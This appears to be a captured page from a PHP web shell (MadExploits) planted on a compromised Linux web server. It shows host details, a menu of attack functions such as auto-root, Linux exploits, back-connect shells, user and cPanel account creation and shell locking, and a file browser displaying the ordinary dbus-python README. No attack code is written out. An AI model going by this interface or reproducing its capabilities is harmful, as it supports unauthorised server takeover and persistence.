Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
676 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dbus-python-1.1.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
COPYING
1.21
KB
-rw-r--r--
ChangeLog
349.97
KB
-rw-r--r--
NEWS
18.92
KB
-rw-r--r--
README
1.97
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
======================================= dbus-python_: Python bindings for D-Bus ======================================= .. _dbus-python: http://www.freedesktop.org/wiki/Software/DBusBindings#python Usage ===== Online documentation can be found at <http://dbus.freedesktop.org/doc/dbus-python/>. There is an incomplete tutorial in `doc/tutorial.txt`__ (if you compile dbus-python with `docutils`_' ``rst2html`` tool installed or you're reading this document on the D-Bus website, there's also an `HTML version`__). __ doc/tutorial.txt __ doc/tutorial.html `API documentation`_ is generated if you compile dbus-python with `epydoc`_ version 3 and `docutils`_ installed. An `online copy of the API documentation`_ is also available. .. _API documentation: api/index.html .. _epydoc: http://epydoc.sourceforge.net/ .. _docutils: http://docutils.sourceforge.net/ .. _online copy of the API documentation: http://dbus.freedesktop.org/doc/dbus-python/api/ To develop on dbus-python, see `doc/HACKING.txt`__ or the `HTML version`__. __ doc/HACKING.txt __ doc/HACKING.html Problems and alternatives ========================= dbus-python might not be the best D-Bus binding for you to use. dbus-python does not follow the principle of "In the face of ambiguity, refuse the temptation to guess", and can't be changed to not do so without seriously breaking compatibility. In addition, it uses libdbus (which has known problems with multi-threaded use) and attempts to be main-loop-agnostic (which means you have to select a suitable main loop for your application). Alternative ways to get your Python code onto D-Bus include: * GDBus, part of the GIO module of `GLib`_, via GObject-Introspection and `PyGI`_ (uses the GLib main loop and object model) * QtDBus, part of `Qt`_, via `PyQt`_ (uses the Qt main loop and object model) .. _GLib: http://developer.gnome.org/glib/ .. _PyGI: https://live.gnome.org/PyGObject .. _Qt: https://qt.nokia.com/ .. _PyQT: http://www.riverbankcomputing.co.uk/software/pyqt/intro
Close